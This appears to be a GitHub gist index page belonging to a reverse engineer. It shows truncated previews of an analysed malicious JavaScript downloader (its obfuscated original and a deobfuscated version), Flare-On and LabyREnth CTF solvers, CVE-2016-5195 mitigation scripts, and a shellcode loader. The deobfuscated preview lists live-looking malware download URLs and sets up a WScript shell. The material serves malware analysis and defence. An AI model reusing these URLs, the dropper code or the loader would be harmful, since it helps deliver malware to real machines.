Skip to content

Instantly share code, notes, and snippets.

View levisre's full-sized avatar
💭
I may be slow to respond.

Levis Nickaster levisre

💭
I may be slow to respond.
72 followers · 11 following
View GitHub Profile
@levisre
levisre / js_decoded_phase1.js
Last active July 15, 2016 16:33
var QSf7 = [OXc9(AAh) + OWVEq9 + (function UNVh7() {
return VXYPv7;
}()) + Pq(Ko) + KAUo + (function FFNu() {
return CCc;
}()) + GHWw2(SJRf) + SKf + Jz + MNx(Gx) + PQq4, KSd + (function NWGd() {
return Ke;
}()) + MEHWy + ETq3 + XIAa + Pu + CKb + VLv5(MTXUp) + Um(TZv3) + UMe + ADSt2, KSd + Ke + Lf6 + (function VBj() {
return ORVx6;
}()) + (function It3() {
return Xd9;
@levisre
levisre / js_deobfuscated.js
Last active July 14, 2016 09:02
var keyBuffer = ("112" + "313" + "2","VVVVVVVVVVVVVVVVVVVVVV"); // VVVVV + VVVV + VV + VVVVV + VV + VVVV);
var keybufferLen = keyBuffer.length;
var keybuffer2 = "VVVVVVVVVVVVVVVVVVVVV"; //VVVVV + VV + VV + VV + VVVVV + VV + VV + V;
var keybuffer2Len = keybuffer2.length; // keybuffer2[leng + th];
var keybuffer3 = ("asfasdfasfd", "VVVVV"); // (asfas + dfasf + d, VVVVV);
var keybuffer3Len = keybuffer3.length; //keybuffer3[leng + th];
var LUj = 1;
var adTypeText = 2;
var malURL = ["http://sirimba.com.br/qiovtl","http://zakagimebel.ru/krcsvf","http://repair-service.london/uywgi7v"];
var wsShell = WScript.CreateObject(WScript.Shell);
@levisre
levisre / original_sample.js
Created July 15, 2016 15:39
function f(s) {return eval(s);};
var aj85dZA = [';}\n','\xff',
'\r;)','\xff',
'(]e','\xff',
'N +','\xff',
' iC','\xff',
'F[5','\xff',
'pCA','\xff',
' ','\xff',
' \n\r','\xff',
@levisre
levisre / AntiD_Solver.py
Created August 22, 2016 07:16
LabyREnth Windows #1 - AntiD
a=[0x8C,0xF1,0x53,0xA3,0x08,0xD7,0xDC,0x48,0xDB,0x0C,0x3A,0xEE,0x15,0x22,0xC4,0xE5,0xC9,0xA0,0xA5,0x0C,0xD3,0xDC,0x51,0xC7,0x39,0xFD,0xD0,0xF8,0x3B,0xE8,0xCC,0x03,0x06,0x43,0xF7,0xDA,0x7E,0x65,0xAE,0x80]
s = ""
d = 0
for i in a:
s += chr((((((i^(d&0x000000FF))+0x66)^0x55)-0x44)^0x33)&0x000000FF)
d += i
print s
@levisre
levisre / cve-2016-5195_mitigation.sh
Created October 26, 2016 07:21
Use systemtap with script to mitigate CVE-2016-5195 (for CentOS vX.X)
#!/bin/sh
###################################
# CVE-2016-5195 Mitigation Script #
###################################
#LINUX_ARCH = $(uname -m)
#KERNEL_VER = $(uname -r)
#NOTE: RUN AS ROOT, MUST BE CONNTECTED TO INTERNET
echo "Removing unused kernel-devel..."
@levisre
levisre / get_package.sh
Last active October 27, 2016 10:22
Bulk crawl and get Link about neccessary Packages that needed to mitigate CVE-2016-5195 with SystemTap on CentOS
#!/bin/sh
#####################################################################
# Get Packages for CVE-2016-5195 mitigation with SystemTap #
# NOTE: SOME CASE IT DOESN'T WORK WITH CentOS 5 #
# Good for bulk download and fix system with various kernel version #
# Written by Levis Nickaster #
#####################################################################
# get kernel version and linux archilecture
# Usage: ./get_info.sh <kernel_version> (i686|x86_x64)
@levisre
levisre / ShellcodeLoader.c
Created November 11, 2016 02:46
Simple Shellcode Loader coded in C. The shellcode must be in binary form
#include <stdio.h>
#include <stdlib.h>
// enable cross compiling
#ifdef __linux__
#include <sys/mman.h>
#elif _WIN32 || _MINGW_
#include <windows.h>
#endif
@levisre
levisre / Flareon_2016_chall4.c
Created November 11, 2016 02:50
Flare-on 2016 Level 4 Solver
/*
Flare-on 2016 Challenge 4 Solver
By Levis Nickaster.
Note: Put the dll file in the same folder before run the compiled exe
*/
#include <windows.h>
#include <stdio.h>
#define DLL_NAME "flareon2016challenge.dll"
@levisre
levisre / Flareon_2016_Chall7_Bruteforce.py
Created November 11, 2016 02:57
Flare-on 2016 Challenge 7 Bruteforcer to get original Hash
# Flare-on 2016 Challenge 7 Hashtable Brute-forcer
# Note: It's not a SHA1 brute-forcer
# It will prints out all possible value to fullfill the algorithm in the binary file
# The correct hash table is the first one which hash "3C" at the first position.
# You can recheck it
hextable = [0x03, 0x72, 0xD7, 0xE5, 0x03, 0xAB, 0xE0, 0xD4, 0x9F, 0xB0, 0xAE, 0x4E, 0x9D, 0x4A, 0x97, 0xAE, 0xE7, 0xEB, 0x42, 0xEF, 0xB0, 0x80, 0x8F, 0x49, 0x9F, 0x1E, 0x28, 0xED, 0x7E, 0x42, 0x80, 0xBC, 0x14, 0xA7, 0x53, 0xA6, 0x0A, 0xA1, 0xDE, 0x43, 0xEC, 0x65, 0xF0, 0x3A, 0x67, 0x66, 0x3C, 0x4A, 0xE7, 0x69, 0xBB, 0x24, 0x25, 0x47, 0x57, 0x2E, 0x59, 0x26, 0x0A, 0x36, 0x95, 0xC4, 0x44, 0xD3, 0xFD, 0x85, 0xB0, 0x47, 0x35, 0xA6, 0x47, 0xBC, 0x83, 0x94, 0xEF, 0x03, 0x6C, 0x73, 0x05, 0xAC, 0xB2, 0x8A, 0xD0, 0x20, 0x9E, 0x7D, 0x18, 0xD4, 0xA6, 0x21, 0xEA, 0x46, 0x03, 0x9E, 0x4D, 0x5F, 0xC9, 0x2E, 0x20, 0xC0, 0xF0, 0x81, 0x17, 0x40, 0x0C, 0x09, 0x5C, 0x57, 0xE4, 0x86, 0x72, 0x05, 0x60, 0x1D, 0x0B, 0x43, 0x5D, 0x4A, 0x34, 0x85, 0x53, 0x10, 0xC
@levisre
levisre / Flareon_2016_Chall8.py
Created November 11, 2016 03:21
Flare-on 2016 Challenge 8 Solver
xorTable = [0xC5,0x38,0xE1,0x4A,0x1B,0x0C,0x1A,0x46,0x46,0x0A,0x96,0x29,0x73,0x73,0xA4,0x69,0x03,0x00,0x1B,0xA8,0xF8,0xB8,0x24,0x16,0xD6,0x09,0xCB][::-1]
encodedFlag = [0x8F,0xBC,0xDF,0x23,0x27,0x49,0x34,0x61,0x2F,0xF7,0x8E,0x34,0x67,0x97,0xAB,0x06,0x62,0x69,0xD6,0x7D,0x2F,0xF2,0x1C,0xA3,0xB0,0xAF][::-1]
print ''.join(chr((xorTable[i]^xorTable[i+1])^encodedFlag[i]) for i in range(0,len(encodedFlag)))[::-1]